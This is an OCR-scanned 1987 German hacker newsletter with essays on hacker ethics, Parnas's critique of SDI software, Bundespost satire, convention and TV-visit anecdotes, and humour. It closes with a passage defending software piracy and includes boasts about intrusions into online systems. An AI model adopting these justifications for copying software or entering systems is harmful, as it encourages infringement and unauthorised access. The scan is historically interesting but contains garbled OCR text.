Umständen geglückt.
Fraglich ist natürlich, ob sich die erforderlichen
Einwilligungen bekommen ließen. Das hängt ganz
von dem jeweiligen Betroffenen ab, und wie man
ihm das Projekt verkauft. Einerseits wird das po¬
tentielle Opfer eines Hacks kein Interesse daran
haben, daß öffentlich vorgeführt wird, wie unge¬
nügend seine Sicherheifsmaßnahmen sind. Ande¬
rerseits würde er sich gewiß gerne damit brüsten
können, daß sein System nicht geknackt werden
konnte. Außerdem erhielte er praktisch eine ko¬
stenlose Sicherheitsüberprüfung, für die sich man¬
che Unternehmen in den USA teure “Haus-und-
Hof-Hacker“ halten.
So gesehen ist es vielleicht gar nicht so unwahr¬
scheinlich, legale Hacks machen zu können. Ich
denke, daß diese Möglichkeit näher untersucht wer¬
den sollte. Unterm Strich ist sie wohl für alle Be¬
teiligten die beste aller möglichen Lösungen.
Stoepsel
CLINCH/DS-RED/STOEPSEL/30.09.87/23;27/12330
11
Bit-Dschungel
Software
in der SDI-
Der Leiter der University of Victoria, Victoria,
Canada; Navel Research Laboratory, Washing¬
ton, D.C.) gegenüber der SDI-Organistion hat
seinen Verzicht auf die weitere Mitarbeit im Aus¬
schuß für computergestützte Kriegsführung dar¬
gelegt. Im Foigenden werden einige Auszüge sei¬
ner Begründung wiedergegeben. Dabei sind
wörtiich übersetzte Zitate in Anführung (’) ein¬
geschlossen.
Einleitend weist Prof. Pamas darauf hin, daß seine
Schlußfolgerung, daß seine Arbeit des Ausschusses
nutzlos sei, nicht politisch motiviert ist. In der Ver¬
gangenheit hat er sich nicht geweigen, an militärisch
geförderten Forschungsprojekten mitzuwirken.
'Meine Schlußfolgerungen basieren auf mehr als
20-jähriger Forschung in der Softwareentwicklung,
einschließlich einer mehr als 8-jährigcn Entwick¬
lungsarbeit an Software für Realzeitsysteme, die für
Militärflugzeugen eingesetzt werden.Sie beruht auf
der Vertrautheit sowohl mit militärisch genutzter
Software als auch mit der Forschung in der
Computer-Wissenschaft. ’
Seine Begründung ist in acht jeweils zwei bis drei
Seiten langen Artikeln niedergelegt:
zu 1)
Für Softwareprodukte wird häufig eine Garantie¬
leistung ausgeschlossen Das liegt daran, daß Indu-
strieprodukte mit analog arbeitenden Maschinen er¬
zeugt werden und die Funktionsweise dieser Ma¬
schine durch stetige Funktionen beschrieben wer¬
den. Die entsprechenden mathematischen Modelle
sind entwickelt und seit langem beherrscht. Dem¬
gegenüber sind Softwarekomponenten Systeme mit
einer sehr großen Anzahl diskreter Zustände. Die
zahlreichen Einzelzustände und Wechselwirkungen
der Komponenten untereinander können derzeit
durch kein mathematisches Modell annähernd voll¬
ständig beschrieben werden. Eventuell kann die ma¬
thematische Logik für die Softwareeniwicklung die
Rolle der Analysis in der traditionellen Technik
übernehmen. Derzeitreichen diese Methoden jedoch
bei Weitem nicht aus, selbst kleine Softwaresysteme
zu behandeln.
zu 2)
Wenn Software die für SDI erforderlichen Eigen¬
schaften besitzen soll, muß man sich felsenfest ver¬
lassen können, bevor man das gesamte Verteidi¬
gungskonzept darauf abstellt. Aus folgenden Grün¬
den ist dieser hohe Grad der Zuverlässigkeit nicht
erreichbar;
1) Warum arbeitet Software unzuverlässig ?
2) Warum das SDI-Softwaresystem nicht ver¬
trauenswürdig sein wird.
3) Warumbei konventioneller Softwareentwicklung
keine zuverlässigen Programme entstehen.
4) Die Grenzen der Methoden des Softwareengi¬
neerings.
5} Künstliche Intelligenz und SDI.
6) Kann automatisierte Programmierung das SDI-
Software-Problem lösen ?
7) Kann Programmverifikation die SDI-Software
vertrauenswürdig machen ?
8) Ist die SDI-Organisation ein effizienter Weg er¬
folgreiche Forschung zu ermöglichen ?
1) Ohne genaue Kenntnis der ballistischen Eigen¬
schaften der Ziele, die mit Hilfe der SDI-Software
identifiziert, verfolgt und letztlich vernichtet werden
sollen, müssen schwerwiegende Fehlreaktionen die'
Folge sein. Es liegen jedoch keine genauen Infor¬
mationen über alle Ziele vor.
2) 'Es wird unmöglich sein, das System unter rea¬
listischen Bedingungen vor einem Einsatz zu testen.’
3) Da einige Sensoren und Abwehrsystemc über
eigene rechnergestützte Leitsysteme verfügen, ent¬
steht so ein Gesamtsystem, das wesentlich kompli¬
zierter als alle bisherigen Systeme ist.
SafcnSd/lciifrcr
zu 3)
Die konventionelle Methode der Softwareentwick¬
lung ist, 'wie ein Computer zu denken’. Die Kom¬
plexität eines Problems und die Abhängigkeit von
Bedingungen, die erst zum Ablaufzeitpunkt ermit¬
telt werden, führt stets dazu, daß Softwarefehler bei
Tests oder sogar erst während de.! Einsatzes fest¬
gestellt werden. In der Industrie gibt es eigenstän¬
dige Arbeitsgruppen, die unabhängig vom Pro¬
grammierer Test durchführen (Qualitätssicherung).
Diese Möglichkeit steht aber für die SDI-Software
nicht zur Verfügung (s. 2)).
zu 4)
Die wichtigsten Methoden bei der Erstellung großer
Softwaresysteme sind;
1) strukturierte Programmierung und der Gebrauch
formaler Programmiersprachen
2) formale Spezifikation abstrakter Schnittstellen
3) der Einsatz kooperierender sequentieller Prozes¬
se.
Anhand eines Projektes der US-Marine zeigt Prof.
Parnas auf, warum die Softwareerstellung uotzdem
nicht problemlos erfolgen kann. Effizientere Pro¬
grammiersprachen und Programmcnlwicklungs-
werkzeuge können zwar diese Probleme mildem,
aber nicht beseitigen. 'Methoden des Software -
Engineerings verhindern keine Fehler.... die erfol¬
greiche Anwendung dieser Methoden hängt ab von
der Erfahrung, die mit der Erstellung und Pflege
vergleichbarer Systeme gesammelt wurde. Es gibt
keinen derartigen Erfahrungsschatz für das SDI-
Kriegsführungssystem. ... Ich gehe davon aus, daß
auch die Forschung der nächsten 20 Jahre keine
Aendemng dieser Tatsache erbringen wird.’
) ODservatonum an Kontroli-
] Zentrum Oie Rakete ist
I 800 Kilometer entlernt Der
I Atommotor hat automatisch
f gezündet
zu 5)
Da insbesondere auch eine so moderne Technologie
wie die der künstlichen Intelligenz im Rahmen der
SDI-Forschung eine große Rolle spielen soll, warnt
Prof. Pamas vor übertriebenen und unrealistischen
Erwanungen ('Künstliche Intelligenz stellt keinen
Zauber zur Lösung unserer Probleme dar. Insbe¬
sondere ist der Einsatz von Computersystemen, de¬
ren Problemlösungsstrategien denen menschlicher
Experten nachempfunden ist, gefährlich, da sich die
Regeln, die man aus der Beobachtung der men¬
schlichen Handlungsweise gewinnt, als inkonsi¬
stent. unvollständig und ungenau heraussteilen.
£ntcii8ri;lctikcr
Nach Meinung von Prof. Pamas ist automatisierte
Programmierung nichts ohne (algorithmische) Pro¬
grammiersprachen, aber Fehlerfreiheit garantieren
sie auch nicht.
'Außerdem ist eines der grundlegenden Probleme
bei SDI. daß uns die Information fehlt, vertrauens¬
würdige Spezifikationen aufzuschreiben.’
zu 7)
Abgesehen davon, daß bisher nur für im Vergleich
zur SDI-Software kleinen Programmen eine Ver¬
ifikation erfolgreich durchgeführt wurde, muß vor
einer Verifikation zunächst eine vollständige Pro¬
grammspezifikation vorliegen (s, 2), 6)). Außerdem
soll die SDI-Software auch dann noch funktionsfä¬
hig bleiben.selbst wenn Teile des Gesamtsystems
zerstört sind.
Es gibt aber bisher, trotz 20-jähriger Forschung auf
diesem Gebiet, 'keine Beweistechniken für die Kor¬
rektheit eines Programms beim Auftreten nicht vor¬
hersehbarer Bedrohung bleiben. (..) Der Präsident
ünd die Öffentlichkeit müssen dies wissen.’
CLINCH/POLITIK/HHNET/1 7.08.87/17:27/6617 Z.
13
What to know about Data Tra¬
vellers
Datenreisen und Hackerethik ■■■■■■
Anläßlich des Bit Bang im September 1987 stellt
sich von neuem die Frage nach der Ethik der
Hackerkultur.
Die meisten Statments des CCC in Bezug auf die
Lebensweise der Hacker gehen in die Richtung;
Hacken ist ein (Lebens-)Einsteilung, die auf Neugier
beruht. Diese äußert sich im Hinterfragen auch der
scheinbar feststehendsten Dinge dieser Welt. Die
Antworten, die die Hacker finden, entsprechen oft
nicht den angeblich so feststehenden Tatsachen. Es
ist der gleiche Wissensdrang, der das Wissen der
Menschheit seit Jahrhunderten vorantreibt.
Trotzdem bleibt es eine Herangehensweise, die den
meisten Menschen fremd ist. Hacken bedeutet stän¬
dige Selbstbeobachtung und -Kontrolle, gleichzeitig
eine Offenheit fürdieabwegigsten Ideen. Wichtig ist
nur eines: daß die Idee weiter auf dem eingeschla¬
genen Pfad führt.
Weiterhin hat der Hacker Erfahrungen gemacht, die
ihm sein Wissen, sprich seine Macht, vor Augen
führt und gleichzeitig die Ohnmacht der meisten
anderen Menschen deutlich macht. Kaum einer ist
dazu mehr berufen, die Fähigkeiten und Schwächen
eines Computers zu beurteilen als ein Hacker, der
sich intensiv mit dem Rechner auseinandergestzt
hat.
Sie haben Respekt vor den Leuten, die noch ein
Stückchen weiter sind als sie: die Systemhersteller.
Sie verabscheuen Leute, die Daten oder Rechner
zerstören, denn sie wissen nicht nur um deren In¬
formationsgehalt sondern auch um die Mühe, diesen
zu erstellen.
Hacker warnen nicht ohne Grund seit Jahren vor den
Schwächen und Grenzen der Systeme. Sie wissen,
wovon sie reden. Meist kennen sie nicht nurdas, was
der normale Benutzer von den Systemen sieht. Hac¬
ker sind keine Anhänger blinden Glaubens an den
Großen Bruder Computer.
In einer Gemeinschaft sollte jeder einen Teil der
Arbeit machen. Hacker tragen Ihren Teil zur Ge¬
meinschaft bei, indem sie versuchen ihre Erfahrun-
14
gen weiterzugeben. Kritik ist neben Kreativität der
stärkste Motor auf dem Weg zu mehr Wissen.
Ein Vorwurf lautet, Hacker würden gegen Gesetze
verstoßen.
Erstens einmal stellt sich da die Frage: gegen Ge¬
setze welchen Landes verstoßen sie denn nun, wenn
sie aus Land A via Land B, C und D nach Land E
Datenreisen. Nach bundesrepublikanischer Recht¬
sauffassung können sie gemäß bundesdeutschem
Recht verurteilt werden, auch wenn Land E Papua
Neu-Ginuea heißt. Eine Meinung, mit der die Bun¬
desrepublik ziemlich einsam auf weiter Flur steht.
Zudem hielt der Gesetzgeber in seinen Erläuterun¬
gen zum 2. Wirtschaftskriniinalitätsgesetz fest, daß
Hacken als solches nicht strafbar gemacht werden
soll.
Es fragt sich außerdem, ob man Personen bestrafen
sollte, die der Gesellschaft mit ihrer angeblich so
verwerflichen Tat einen Dienst erwiesen haben.
Maßgeblich beeinflußt wird diese Frage natrlich
dadurch, daß in vielen Fällen Fehler der Compu¬
terhersteller Ursache für Hacks sind. Soll man nun
diejenigen bestrafen, die diese Fehler aufspürten,
oder diejenigen, die sie verursachten?
Hacker sind oft schwer zu begreifende Individuen,
doch sollte das alle anderen dieser Weltengesell¬
schaft nicht dazu verleiten, sie zu verachten. Das
würde bedeuten, daß man sich vor der Wahrheit
versteckt.
Asterix
Zum Schluß ein Hinweis auf zwei Eücher:
Steven Levy, “Hackers - Heroes Of The Computer
Revolution", Anchor Press/DouDleday, Garden City,
New York, 1984
BMI Landreth, "Out Of The Inner Circle - A Hackers
Guide To Computer Security", Microsoft Press, Was¬
hington, 1984 (auf Deutsch bei Goldmann)
S)Afcii8d;lculicc
Stop and Go
'Bitte haben Sie Verständnis, wenn es zu Verzö¬
gerungen in der Bearbeitung kommt, wir haben
auf Computer umgestellt.'
Dieser Spruch kennzeichnet vielfach die Irrungen
und Wirrungen, die sich bei der Einführung neuer
Technologien ergeben. Besonders wirkungsvoll
geht dabei wieder einmal die Post vor, die unlängst
mehrere Laserdrucker erworben hat und versucht,
mit den professionellen Geldinstituten Schritt zu
hallen. Bei denen gibt es ja schon seit Jahren die
scheckgrossen rot-gelben Formulare, mitdenen man
fast alle Geldgeschäfte erledigen kann, ohne an seine
Haiisbank gebunden zu sein. Beleggebundener
Zahlungs-Verkehr nennt sich diese Buchungslechnik
und ist ohne entsprechende Rechnerkapazität nicht
zu bewältigen.
Bei der Post versucht man es trotzdem. Und erzeugt
so lange Schlangen vor den Schaltern und lange
Gesichter bei den Schalterbeamten. Getreu dem al¬
ten Bundeswehrmotto 'Warum Maschinen einsel-
zen, wenn man das auch mit Arbeitskraft hinkriegi’
wird aus dem BZV bei Postensein lisiengebundener
Zahlungsverkehr, dessen höchster Automatisie¬
rungsgrad in der Verwendung eines Stempels be¬
steht. Und warum dieses? Nicht etwa, weil die neuen
Formulare so hübsch bunt sind und den Rechen¬
zentren die Gelegenheit geben, die sündieueren La¬
serdrucker endlich zu benutzen (das Posthorn auf
den Telefonrechnungen ist übrigens vom Design her
völlig daneben), sondern weil in naher Zukunft
EPOS kommt, der elektronische Postschalter, der ab
1988 den ohnehin knappen Platz im Standard¬
schalter noch weiter verringert.
Zwar gibt es noch keine entsprechend ausgebildeten
Techniker, vom Bedienungspersonal ganz zu
schweigen, aber immerhin, EPOS kommt. Und des¬
halb gibt es jetzt schon die neuen Formulare, die
noch nicht mal die Selbstdurchschreibequalität ha¬
ben,dieman bei derBank seit Jahren kennt. Überdies
ist es erheblich Zeit - und Energiesparender, stan der
neuen Belege einen der guten alten blauen Zahl¬
scheine zu benutzen. Oder man greift gleich zur
BTX-Kontenführung Und erspart sich und dem
Schalterpostler eine Menge Stress...
Hack’n’Crack
2.CSS Summa Convention in Stuttgart.
Im Wonnemonat Juli fand In Stuttgart wieder ein
'Convention statt. Bekannte Cracker und Hac¬
ker aus Deutschland, der Schweiz, Frankreich
und Bayern waren angereist.
Zwi.schen Freitag und Sonntag fanden viele keinen
Schlaf, da es neben dem Cracken und dem Erfah¬
rungsaustausch auch Harddisks (ST), Demos und
einen Mega ST-2 zu bestaunen gab. (Der Mega ST
konnte nichts, und selbst das nicht lOOprozentig.)
Das babylonische Stimmengewirr wurde mittels der
Sprachen Englisch und Assembler überwunden, bis
zu dem Moment, in dem eine Sicherung etliche
Ramdisksund einen Prozessor ins Nirwana schickte.
Die Nacht war dem Hacken Vorbehalten. Besonders
Delphi und eine Schweizer Pad mußten dran glau¬
ben.
Auf dem Convention hat sich auch gezeigt, daß es
einen selbst Hackern nicht immer bekannten (Hi
Chaos) Unterschied zwischen Raubkopierem und
Crackern gibt.
Raubkopierer:
- Null Originale
- Wissen grade, wie man ein Copy bedient.
- Verkaufen illegal Software
Cracker: - Machen Programme 'handlicher'
- Haben Dutzende von Originalen
- Programmieren wie die Idioten
- Hassen raubkopierer und die Pest.
DAS ist ein riesiger Unterschied. Sollte vielleicht
manchem zu denken gben.
Terra
goblln
S>nlciiild(Iciibcr
Hambulgel Hackel
Japanisches Fernsehen zu Gast beim CCC
Zwei Jahre „danach“ ist die japanische Öffent¬
lichkeit offenbar auf den damaligen (??? hebe)
Hack in Tsukuba aufmerksam geworden.
Die japanische Fernsehgesellschaft „NHK“ ent¬
sandte daher ein mit Ausdrucken von Phineas-
Protokollen bewaffnetes Fernsehteam, um die be¬
treffenden deutschen Hacker zu befragen und ihnen
ein wenig auf die Finger zu schauen. Man traf sich
bei Steve und beantwortete ersteinmal einige all¬
gemeine Fragen zur Tätigkeit und Motivation der
CCCTer sowie einige Einzelheiten des Tsukuba-
Zugangs aus Hamburg. Ich grüßte per TV unseren
alten Freund Youhei Morita (Network Manager des
KEK), der uns damals freundlicherweise privile¬
gierte accounts eingerichtet hatte. Natürlich konnte
(und wollte?) man nach so langer Zeit nicht alle
Einzelheiten des damaligen Hacks zum Besten ge¬
ben. Stattdessen einigten wir uns, am Beispiel Auto-
hacking den japanischen Zuschauern, besonders de¬
nen unter 18 Jahren, einmal zu demonstrieren, wie
wenig technische Infrastruktur als Eintrittskarte für
das Globale Dorf notwendig ist. Wir sattelten also
die Pferdchen und kämpften uns durch den frühen
Feierabendverkchr bis zur Außcnalster vor, um den
Japanern noch etwas Hamburg als Gratisbeilage mit¬
zugeben. Vor einer Datentankstelle Auf dem Rand¬
grün hielten wir zum Aufbau derTV-Gerätschaften.
Das Drehbuch hatten wir uns spontan unterwegs
ausgedacht'. Eleganter Sportwagen mit In¬
halt (2 Hacker, ein MultiSpeed und ein Schlabber¬
phon) nähern sich, über den staubigen Fußweg ent¬
lang der Alster gleitend.der gelben DTankstelle. Ein
Hacker steigt aus, das lange Serialkabel langsam
abwickelnd, und befestigt das Schlabberphon am
Schnorchel zur grossen weilen Welt. Zwanzig Pfen¬
nige klimpern leise in den Münzer, dazu Rockmusik
aus dem Auto. Der zweite Hacker verharrt vor sei¬
nem japanischen Laptop und reizt Datex an... -
Abtanz.
Mit der Verbindung klappte es nicht ganz, da die
Konfigurati on (mit freundlicher Unterstützung von
auf die Schnelle zusammengestellt
worden war. Das jedoch war den Japanern nicht so
wichtig, denn daß es funktioniert, glaubten sie uns
auch so. Viel wichtiger schien ihnen, das Material so
schnell wie möglich nach Japan zu bekommen. Viel¬
leicht, damit ihnen keiner die Story abjagen kann
(nach 2 Jahren !!). Als wir schon mit dem Abbau
begonnen hatten, ließ ich mich mich dazu hinreissen,
meinen Koffer vor der Kamera auszupacken. Der
Kameramann zeigte sich entzückt, besonders vom
Gaslötkolben und der eingepaßten 20 MB Festplatte.
VIc.
CLlNCH/DS-RED/vrC/28.08.87/00:51/2679Z.
16
Snfcndiljlcttiicr
COMMUNITY COMPUTING ’87
Report now available
If you were at Community Computing ’87 in
January, you’ll want a copy of the report, fo
remind you of all those names, ideas, wonderful
times, awfui kitchen staff and what it was like Ihe
Weekend before Britain ground toa halt in snow-
drifls. If you weren’t therc you’ll need a copy to
realise just how much you inissed.
To remind you - it includes Items on:
- access to Computers for disabied people
- access to training
- funding Computer projects
- women & new technology
Copies of the report are available from:
Joy Bryant
Community Computing in Newcastle
2nd floor, Low Friar House
36-42 Low Friar St
Newcastle upon Tyne NEl 5UE
Send 1.50 per copy (inc postage) with your order.
Cheques should be madc payablc to COMMUNITY
COMPUTING NETWORK Please pass this mes-
sage on to your friends, colleagues, anyone.
CCN Regional Reps on Oeonet (Aug 87);
LYNDA.GARFIELD South Wales
SUNNYHILL Cumbria
CCIN North East AND general enquiries
R.HASELGROVE West Yorks
JULIAN.TODD West Country
PETEROWAN Kent & E. Sussex ANDmembership
applicaiions
LITRU London
For other CCN members use the Geonet command
LIST CCN-ML
COMPOSTtSERVER 5-Aug-87 15:27
CLINCHlALLGEMEINES/HHNET/05.08.87
17
Das Wlutantenkorps der Post
Wird Uri Geller naechster Postminister?
Während Parapsychologen in aller Welt sich ver¬
zweifelt bemühen, den wissenschaftlichen Nach¬
weis der Existenz übersinnlicher Phänomene wie
Telekinese, Telepathie, Telefonieren und der¬
gleichen zu erbringen, ist die Deutsche Bundes¬
post mal wieder einen Schritt weiter.
Humor
SI5UWD
HUM0RR5PAKTeUR-i
PASS ICH MICHT
LACHCi:
fördert Kreativität und Produktivität
FERNWTRKEN heißt das Stichwort, mit dem die
Post in den Bereich des Übersinnlichen vorstoßen
. will. Im kurzen Amtsenglisch: TEMEX. Derzeit gibt
es noch erhebliche Schwierigkeiten, eine genügende
Zahl geeigneter Medien zu verbeamten, daher setzt
man amtlicherseits auf Altbewährtes, nämlich die
Mikroprozessortechnik.
Wo früher ein simples Relais ausreichte, um einen
Einbruch zu melden und die Ordnungshüter in
Marsch zu setzen, waltet heute der Computer und
simuliert für nur noch DM 8.50 je Monat (Preisfrage:
Woher kennen wir diesen Betrag?) einen schlichten
Schaltkontakt, der dem gestressten Yuppie am
Strand der Costa Quanta beispielsweise mitteilt, daß
das heimische Aquarium seinen Inhalt in die dar¬
unterliegenden Wohnungen entleert hat. Zu allem
Überdrußdarf sowas nureinmal im Monatpassieren.
Neigt das Aquarium zu periodischer Leckage, wird
es automatisch teurer. Der technisch versierte Leser
wird sich zu Recht fragen, warum ein Ereignis, das
technisch gesehen dem Abheben des Telefonhörers
entspricht, plötzlich so teuer wird. Der Grund dafür
liegt wohl im geplanten Ersatz der störanfaelligen
Technik durch medial begabte Postler, deren Ar¬
beitsplatz finanziert sein will.
Eine weitere Ausbaustufe von TEMEX sieht unter
anderem die Fernablesung von Messgeräten vor. Die
hiesigen Wasserwerke erwägen bereits ernsthaft,
Gebrauch davon zu machen, um endlich litergenau
festsiellen zu können, wann die Pause des Länder¬
spiels begonnen hat. Unter Zurückstellung erhebli¬
cher datenschutzmäßiger Bedenken entsteht hier
durch die Fernablesung der Wasseruhren eine Al¬
ternative zum TED, der den neuen Medien - im
wahrsten Sinne des Wones - nicht mehr das Wasser
reichen kann.
goblin
postmu22.dS 220787 2047
18
Hamburg (clinch) - Spaß und Humor steigert die
Kreativität, sagt die Psychologin Dr. Alice M.
Isen von der University of Maryland in Balti¬
more. So konnte sie feststellen, daß die Kreati¬
vität von Versuchspersonen deutlich höher war,
wenn sie gerade einen lustigen Film gesehen hat¬
ten. Sie lösten dann zum Beispiel deutlich schnel¬
ler das Problem, eine Kerze mittels Heftzwecken
so an einer Korkwand zu fixieren, daß sie nicht
tropft - indem sie kurzerhand die Schachtel für
die Zwecken an die Wand hefteten und als Ker¬
zenhalter entfremdeten. “Unerfreute“ Zeitge¬
nossen waren dagegen meist Opfer einer “funk¬
tionalen Fixiertheit“, das heißt, sie tendierten
dazu, die vorgelegten Objekte nur ihrer üblichen
Bestimmung gemäß zu verwenden.
Der Psychologe Davin Abramis von der California
State University in Long Beach stellte laut New
York Times bei der Untersuchung von 382 Personen
fest, daß jene am erfolgreichsten waren und mit ihren
Kollegen am besten auskamen, die in ihrer Arbeit
auch Spaß sahen. Eine wichtige Quelle hierfür war
das Scherzen mit Kollegen.
Daß Humor Kindern das Lernen erleichtert, stellt Dr.
Dolf Zillman im Handbook of Humor Research
(Springer Verlag) fest. Er warnt allerdings vor Iro¬
nie, die junge Kinder meist nicht verstehen und
empfiehlt, möglichst über Dinge zu witzeln, die
nicht gerade Lemgegenstand sind. Bei Jugendlichen
und Studenten hingegen kommen bezugsfremde
Scherze eher schlecht an. Generell kommt dem ge¬
meinsamen Lachen eine wichtige soziale Funktion
zu, indem es einen unausgesprochenen Konsens sig¬
nalisiert, insbesondere bei “heiklen" Themen.
Aus DIE ZEIT Nr.36, 28. August 1987
jwi 060506 Sep 87 BEREICH CLINCH HUMOR
CLINCH/ALLGEMEINES/UGE/07.09.87/05:11/1703 Z.
£>nleii$d)Icuiicr
■ lJUCHriR
(1) EARN Remingway
Wem die BELL-Norm schlägt
(2) Karl May
Der Satz im Siibensee
Einführung in die unstrukturierte Textverarbeitung
(3) Karl Juni
Winneone
(4) Karl Juli
Winnelwo
(5) Marcel Plus
Auf der Suche nach dem verlorenen Byte
(6) W. Irrsinn
Zen oder die Kunst, undokumentierten Code zu
warten
(7) Charles Bugkowski
Gedichte, die einer schrieb, bevor er seinen Edi¬
tor aus dem zehnten Stockwerk warf
(8) Tracy Kleinbahn
Die Seele einer neuen Schiene
(9) Harun Digit Al Rashid
Ali Caga und die vierzig Zeichen
Volksmärchen
(10) Raymond Händler
Der lange Code zum kurzen Absturz
SntenSd)Icubcr
(11) Jack Tramtel (Hrsg.)
Der Untergang des ROM
(12) Agatha Christie
Reset am Nil
(13) Astrid Linkdröhn
Pippi Langwort
(14) Christian Manmußdasmal Anderssehn
Peterchens Druckeranpassung
(15) Johann Vorgang von Güte
Die Leiden des jungen Konverter
(16) Hermann Hesse
Das Magnetblasenspiel
(17) Euripides
Ariadne auf Nixdorf
(18) William Scheckspeare
King Clear
(19) Ready Miller
Stille Tage in CLINCH
(20) Marquis de Start
Quälcode
(21) Ladislaus Freiherr von Software-Masoch
Wie ich lernte, Public-Domain-Programme zu
lieben
(22) Kerningham/Ritchie
Prinibad der C-Fahrer
(23) lan Lemming
For your AI only
19
Raubkopieren
Vorweg: die ganze Diskussion um die Raubko¬
piererei ist im Grunde ohnehin sinnlos, denn
kopiert wird ohnehin - egal, wie gut die Argu¬
mente der Kopiergegner auch sein mögen.
Dennoch - damit empfindsame Gemüter keine Ge¬
wissensbisse kriegen - hier einige wie ich finde
schlagende Argumente für die sog. “Raub“kopie-
rerei:
In der Praxis sieht es in der Regel so aus, daß
Mikrocomputersoftwaie von kommerziellen An¬
wendern häufig gekauft wird, private Anwender
dagegen lieber auf preisgünstigere Raubkopien zu¬
rückgreifen. Daraus zu folgern, kommerzielle An¬
wender seien in irgendeiner Form den privaten Ko¬
pierern moralisch überlegen, ist Unsinn. Kommer¬
zielle Anwender kaufen eher, weil
a) bei ihnen die Gefahr der Entdeckung grösser ist als
bei privaten (Kundenverkehr, ärgerliche Mitarbeiter
u.ä.)
b) weil kommerziellen Anwendern oft die erfor¬
derlichen Verbindungen zur Kopiererszene fehlen
und das Aufbauen dieser Verbindungen oft teurer
und riskanter ist, als die Software zu kaufen
c) kommerzielle Anwender mehr als private auf den
Support der Software angewiesen sind und
d) weil, wenigstens in einigen Bereichen, die Pro¬
duktivitätssteigerung durch Software so immens ist,
daß die Anschaffungskosten verglichen damit lä¬
cherlich gering erscheinen
e) weil in einigen Bereichen EDV-lnvestitionen so¬
gar noch stärker als andere Investitionen steuer-
mindemd wirken.
Wie man sieht, fünf gute Gründe für den kommer¬
ziellen Anwender, Software zu kaufen. Alle diese
Gründe fallen für die privaten Anwender, also für
Dich und mich, weg. Und - Du und ich kaufen jaauch
so gut wie nie Software, oder? Im Grunde ist doch der
Softwaremarkt eine sehr soziale Veranstaltung: Fi¬
nanzkräftige Käufer kaufen die Software, finanzie¬
ren somit die Entwicklungskosten, finanzschwache
private Anwender ziehen sich eben Kopien. Eigen-
lich sollten alle zufrieden sein.
28
Die Gegner der “Raubkopiererei“ (hauptsächlich
Softwarefirmen, komisch, nicht war?) haben sich
dennoch einige Argumente gegen diese Form des
Vertriebes ausgedacht. Sie sind es wert, einmal unter
die Lupe genommen zu werden.
Eines der wichtigsten lautet: Kopieren fügt den Fir¬
men erheblichen finanziellen Schaden zu, jede un¬
autorisierte Kopie ist ein Verdienstausfall für die
Herstellerfirma.
Diese Argument ist nicht ganz von der Hand zu
weisen. Allerdings gilt es nur in stark abge¬
schwächter Form. Bsp.: ein entfernter Bekannter
von mir hat sich kürzlich für seinen privaten Bedarf
ein Statistikprogramm beschafft - natürlich kosten¬
los. Dieses Programm hätte ihn, legal gekauft, läp¬
pische 18.000 DM gekostet. Es ist natürlich Unsinn
anzunehmen, er hätte es für diesen Preis gekauft.
Außerdem: was interessiert mich als Anwender die
Ertragslage einer Softwarefirma? Eine Softwarefir¬
ma ist kein Wohlfahrtsveiein. Sie will Geld ver¬
dienen. Ich will kein Geld ausgeben. So what?
Ein weiteres Argument der Gegner; Kopieren macht
die Software teuerer. Nochmal: was interessien
mich, wie teuer Software ist? Ich kaufe sowieso
keine. Von niedrigeren Preisen profitieren also oh¬
nehin nur kommerzielle Anwender- und für die sind
die Kosten für Software im Vergleich mit dem Pro¬
duktivitätszuwachs wie gesagt meist vemachläs-
sigbar.
SnlciiSiliIciihtr
Ein besonders herzzerreißendes Argument - fast ein
Wunder aus dem Mund der sonst gar nicht so so¬
zialen Softwareindustrie - lautet: Die Einbußen, die
durch Kopiercrei entstehen, gehen zu Lasten der
armen, angestellten Programmierer, die um die
Früchte ihrer harten Arbeit gebracht werden. Un¬
sinn. Erstens; Ein Unternehmen, das angestellte Pro¬
grammierer in Abhängigkeit von verkauften Stück¬
zahlen bezahlt, wälzt das unternehmerische Risiko
(daß das Unternehmen als Rechtfertigung für seine
Gewinne benutzt) auf abhängig Beschäftigte ab. Das
ist ungerechtfertigt. Ein Programmierer kann sich
nicht leisten, von Lust und Laune des Marktes ab¬
hängig zu sein, wenn es um sein Einkommen geht.
Schließlich ist er abhängig beschäftigt, nicht etwa
Unternehmer. Das viele Unternehmen es dennoch
schaffen, Programmierer zu derartigen Konditionen
zu beschäftigen, liegt teilweise auch am Desinte¬
resse derselben an ihren eigenen Rechten. Ich kenne
jedenfalls genügend Programmierer, die sich alles
gefallen lassen, wenn es nur ein paar Mark gibt und
sie ordentlich daddeln dürfen.
Und selbst wenn ein Programmierer in Abhängigkeit
von Stückzahlen bezahlt wird, schadet ihm Kopie¬
rerei nur unter der unbewiesenen Annahmen, daß
diese die Erträge schmälert. Und noch etwas: Trotz
allem Geschrei geht es den meisten Softwarefinnen
gelinde gesagt sehr gut. Kaum eine andere Branche
hat ähnliche Zuwachsraten zu verzeichnen. Unterm
Strich profitiert die Mikrocompuierindustrie sogar
von der Kopiererei. Dazu ein paar Beispiele;
Der immense Erfolg des C-6d wäre ohne eine gut
funktionierende Infrastruktur, die auch den letzten
Anwender mit kostenloser Software versorgt, nicht
denkbar gewesen. Es ist bekannt, daß bei der Ent-
wicklungs des C-64 eine Maxime war, auf dieser
Maschine einen effektiven Kopierschutz schon von
derArchitekturderHardware unmöglich zu machen.
Commodore will schießlich Hardware verkaufen,
und nichts wirbt besser für einen Computer als ko¬
stenlose, leicht erhältliche Sofware.
Nächstes Beispiel: die Diskettenhersteller. Wie sä¬
hen deren Umsätze ohne das segensreiche Tun der
Kopierszene aus? Oder; Verlage. Wer kennt nicht
die berühmte Buchreihe “Das Buch zu ihrer Raub¬
kopie“, die mittlerweile fast jeder im Mikrocom¬
puterbereich tätige Verlag im Programm hat. Es ist
kein Geheimnis, daß z.B. Data Becker, einer der
militantesten Gegner der Raubkopiererei, von ein¬
igen Buchtiteln mehr verkauft hat, als von dem
dazugehörigen Programm.
Snlcnärijfciiticr
Weiter: Kopien machen ein Programm bekannt. Die
Wirtschaft verlangt nach Kräften mit EDV-
Erfahrung. Wenn sie junge Leute mit Computer-
Erfahrung einslellen: womit haben die ihre Erfah¬
rungen gesammelt? Mit gekaufter Software? Wohl
nur selten. “Raub“kopien können sogardie Umsätze
von Softwarefirmen steigern. Angenommen, ich ha¬
be zu Hause ca. 7 verschiedene Textprogramme
rumfliegen - alle natürlich selbst kopiert- und arbeite
nun vorzugsweise mit, sagen wir, MS WORD. Ich
werde nun von einer Firma eingestellt und ent¬
scheide mit über die Anschaffung eines Satzes von
Textprogrammen. Für welches werde ich mich auss-
sprechen? Erraten!
Natürlich gibt es bei der Kopierei juristische Pro¬
